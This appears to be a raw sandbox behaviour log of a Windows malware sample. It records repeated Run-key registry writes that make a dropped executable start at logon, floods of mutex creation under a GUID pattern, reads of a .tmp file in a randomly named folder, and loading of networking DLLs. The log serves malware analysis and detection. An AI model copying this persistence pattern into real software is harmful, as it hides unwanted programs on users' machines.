Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2006625665
System info queried Type: ProcessInformation success or wait 2006627402
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2006636894
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2006639074
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2006640066
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2006640980
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2006641942
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2006642950
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2006643853
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2006644792
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2006645735
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2006646648
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2006647587
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2006648494
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2006649406
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2006650796
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2006651624
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2006652537
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2006653478
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2006654383
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2006655210
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2006656144
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2006657052
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2006658030
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2006658963
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2007361087
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2008071514
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2008800135
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2009526616
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2010252569
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2010979912
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2011706984
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2012444636
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2013161229
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2013888338
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2014615952
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2015345366
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2016069403
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2016796712
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2017524007
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2018250916
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2018980766
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2019706094
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2020432285
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2021159128
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2021886076
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2022613319
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2023343357
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2024067719
System info queried Type: ProcessInformation success or wait 2024523244
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2024532162
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2024534327
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2024535265
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2024536168
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2024537030
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2024537907
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2024538789
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2024539712
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2024540740
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2024541672
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2024542555
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2024543454
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2024544356
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2024545739
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2024546567
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2024547481
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2024548421
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2024549325
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2024550152
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2024551084
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2024551992
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2024552967
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2024553901
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2024808328
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2025524364
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2026251598
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2026976086
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2027703212
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2028430198
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2029157316
System info queried Type: ProcessInformation success or wait 2042413728
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2042420351
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2042422549
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2042423498
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2042424419
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2042425301
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2042426196
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2042427096
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2042428038
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2042428987
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2042429902
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2042430849
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2042431760
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2042432676
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2042434155
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2042434998
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2042435920
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2042436870
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2042437785
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2042438712
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2042439667
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2042440633
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2042441619
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2042442563
System info queried Type: ProcessInformation success or wait 2061051004
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2061058345
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2061060670
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2061061639
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2061062576
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2061063464
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2061064365
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2061065357
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2061066298
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2061067237
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2061068149
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2061069091
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2061069994
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2061070913
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2061072296
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2061073122
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2061074037
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2061074977
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2061075889
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2061076714
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2061077648
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2061078558
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2061079533
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2061080468
System info queried Type: ProcessInformation success or wait 2078934097
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2078940708
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2078942876
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2078943821
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2078944736
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2078945606
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2078946496
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2078947390
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2078948335
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2078949271
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2078950450
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2078951475
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2078952474
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2078953387
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2078954773
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2078955600
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2078956513
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2078957451
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2078958361
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2078959184
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2078960115
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2078961023
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2078961999
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2078962938
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Ebci buffer overflow 2095600713
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Ebci buffer overflow 2095602284
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Ebci success or wait 2095603330
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Okmaykid success or wait 2095630106
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Okmaykid success or wait 2095630625
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 2850000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2095655662
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 2850000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2095662174
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2095665571
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2095992509
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Ebci buffer overflow 2095993693
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Ebci buffer overflow 2095995183
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Ebci success or wait 2095995862
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Okmaykid success or wait 2096021623
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Okmaykid success or wait 2096022140
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2096023000
File read Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Offset: none Length: 5 Value: 05 0D 8C 79 C9 end of file 2096024795
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2096030099
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2096032077
Section loaded Path: \KnownDlls\MPRAPI.dll Access: write and read and execute Type: unknown Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2096224624
Section loaded Path: C:\WINDOWS\system32\mprapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid success or wait 2096227069
Section loaded Path: \KnownDlls\ACTIVEDS.dll Access: write and read and execute Type: unknown Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid object name not found 2096230550
Section loaded Path: C:\WINDOWS\system32\activeds.dll Access: query and write and read and execute Type: image Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid success or wait 2096233025
Section loaded Path: \KnownDlls\adsldpc.dll Access: write and read and execute Type: unknown Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid object name not found 2096237960
Section loaded Path: C:\WINDOWS\system32\adsldpc.dll Access: query and write and read and execute Type: image Baseaddress: 76E10000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2096241038
System info queried Type: ProcessInformation success or wait 2096831544
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2096838181
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2096840348
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2096841200
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2096842101
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2096842964
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2096843843
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2096844722
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2096845644
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2096846649
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2096847561
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2096848495
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2096849676
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2096850587
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2096852073
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2096852902
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2096853812
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2096854749
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2096855655
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2096856480
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2096857411
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2096858316
